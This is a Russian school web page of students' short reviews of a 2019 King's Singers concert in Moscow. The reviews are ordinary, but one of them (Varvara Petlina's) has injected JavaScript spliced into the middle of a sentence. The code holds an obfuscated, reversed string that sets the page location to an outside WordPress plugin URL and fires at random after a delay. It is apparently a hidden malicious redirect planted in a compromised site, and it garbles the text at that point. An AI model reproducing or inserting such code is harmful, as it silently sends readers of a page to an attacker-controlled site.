logo

Рождественский фестиваль В. Спивакова

23 января 2019 года ученики 7-8 классов в сопровождении кураторов Ларисы Евстафьевны Расторгуевой и Екатерины Алексеевны Прошкиной сходили на концерт британской группы “The King’s singers” в Московский международный Дом музыки. Это был юбилейный тур к 50-летию коллектива.
Время, проведенное на концерте, оставило незабываемое и очень яркое впечатление!

Скобинова Валерия, 7 класс
Мне очень понравилось выступление группы из Великобритании «The King’s
singers»! Я в восторге от голоса, тембра и артистичности каждого из шести
исполнителей! Также мне очень понравилось, как все они взаимодействовали с залом, общались со зрителями и смогли создать атмосферу, напоминающую скорее не концерт, а просто дружескую встречу. Мне, пусть я и не являюсь большим поклонником классической музыки, понравилось каждое исполненное ими произведение, а во второй части концерта они спели всем известные песни (в том числе и группы «The Beatles») в своём стиле (а капелла).
У одного из артистов был день рождения. Когда его коллега сообщил об этом зрителям, весь зал начал петь песню «Happy Birthday», и это было очень трогательно, особенно реакция Джонни!
У меня остались потрясающие впечатления, и я надеюсь, что будет возможность побывать на концерте этой группы ещё раз!

 

Осетров Арсений, 7 класс
Недавно мы посетили Дом музыки, где проходил концерт британского ансамбля «The King’s singers», который исполнял нам народную эстонскую, болгарскую, немецкую музыку.
Мне очень понравилось это выступление!

 

Полякова Софья, 7 класс
В среду мы съездили в Дом музыки. Там мы слушали концерт группы из Великобритании «The king singers». Группа в Москве была всего два дня, и я очень рада, что попала на это выступление.
Музыканты «The king singers» предложили «отправиться» в путешествие от Москвы до Великобритании. В первой части я услышала французские, эстонские, болгарские, немецкие песни. Как же прекрасно сливались голоса исполнителей! Меня это поразило. А ещё то, как артисты взаимодействовали с залом. В конце второй части представления они поздравляли своего коллегу Джонни с днём рождения. По-моему, это было очень мило, потому что весь зал начал петь популярную песню «Happy Birthday».
Больше всего мне понравилась вторая часть, потому что группа исполняла современную музыку. Также я услышала песни группы «The Beatles», а их композицию о любви я до сих пор слушаю снова и снова!

 

Саргсян Жасмин, 7 класс
23 января мы посетили концерт ансамбля «The Kings Singers», который проходил в Международном Доме музыки. Концерт был очень интересным, потому что певцы исполняли песни разных стран, начиная от русских народных, заканчивая песнями английской группы «The Beatles». Голоса исполнителей звучали очень гармонично, сливались в единое целое. Также мне понравилось, что ансамбль взаимодействовал с залом, и благодаря этому концерт был ещё интереснее. Нам было важно посетить его, потому что мы сами поём в школьном ансамбле. И это здорово – увидеть, к чему мы должны стремиться! Этот концерт оказался для меня не просто интересным, но и очень полезным и актуальным!

 

Петлина Варвара, 7 класс
В среду, 23 января, мы отправились в Московский международный Дом музыки, чтобы послушать известный ансамбль из Великобритании «The King’s singers». Этот концерт был уникальный, потому что певцы находились в Москве всего 2 дня!
С самого начала мне стало интересно и приятно слушать разнообразные песни, которые прекрасно показывали мастерство ансамбля. Мы погрузились в мир музыки, проделав «путешествие» от Москвы до Лондона, слушая песни таких стран как Эстония, Россия, Франция, Германия, Англия. Я сразу заметила, что все певцы очень позитивные. Они не просто пели, но и работали с залом. У одного из участников в этот день был день рождения, а когда слушателям об этом сказали, весь зал спел певцу Джонни известную песню «Happy birthday toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to you»! Это было очень мило, а ему приятно. После выступления в фойе ММДМ проходила автограф-сессия с исполнителями группы, где можно было сфотографироваться, пообщаться и получить автограф.
Я очень рада, что мне удалось побывать на этом мероприятии, потому что такой жизнерадостности и самоотдачи на концертах я ещё никогда не встречала. Спасибо большое за такую поездку!

 

Глазкова Юлия, 8 класс
В среду мы ходили на концерт группы «The King’s Singers». В первой части исполнялись песни на 10 разных языках, и было ощущение, будто мы отправились в путешествие из России в Англию. Многоголосие было потрясающее! Голоса наполняли всё пространство вокруг.
Но больше всего мне понравилась вторая часть, где пели знакомые песни «The Beatles». А ещё было мило, когда весь зрительный зал спел «Happy Birthday» одному из вокалистов.
После концерта Яна, моя одноклассница, взяла автограф у одного из участников группы. Этот концерт был очень запоминающимся!